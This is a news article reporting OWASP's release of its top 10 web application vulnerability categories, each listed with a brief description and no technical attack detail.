Open-source group names 10 scariest Web vulnerabilities

The Open Web Application Security Project today released a list of the top 10 vulnerabilities in Web applications and services.

The group said it wants to focus government and private-sector attention on common weaknesses 'that require immediate remediation.'

'Also, in the longer term, this list is intended to be used by development teams and their managers during project planning,' the report noted. 'Ultimately, Web application developers must achieve a culture shift that integrates security into every aspect of their projects.'

OWASP is a volunteer open-source community project created to bring attention to security for online apps. It patterned its list on the SANS Institute and FBI top 20 list of network loopholes. Like the SANS-FBI list, the OWASP vulnerabilities are well known, but continue to represent significant risk because they are widespread. They can be exploited by code in HTTP requests that are not noted by intrusion detection systems and are passed through firewalls and into servers despite hardening.

The vulnerabilities, which focus on categories of problems rather than on specific applications, are:

  • Unvalidated parameters, which let information to be used by an app before being validated

  • Broken access control, in which restrictions on authorized users are not enforced

  • Broken account and session management, which leave inadequately protected account credentials and session tokens vulnerable to hijacking

  • Cross-site scripting flaws, which let attacks be passed by an app to a browser

  • Buffer overflows, which can crash an application and allow it to be taken over

  • Command injection flows, in which improper commands are passed by the app to another system for execution

  • Error-handling problems, which can provide an attacker with unintended information or deny service when errors occur

  • Insecure use of cryptography, which provides weak protection when cryptography code is not properly integrated

  • Remote administration flaws, in which administrative functions are not well protected

  • Web and application server misconfiguration.


  • The complete report is available on the organization's Web site, www.owasp.org.

    About the Author

    William Jackson is a Maryland-based freelance writer.

    inside gcn

    • IoT analytics platform

      Modern data analytics for public safety IoT

    Reader Comments

    Please post your comments here. Comments are moderated, so they may not appear immediately after submitting. We will not post comments that we consider abusive or off-topic.

    Please type the letters/numbers you see above

    More from 1105 Public Sector Media Group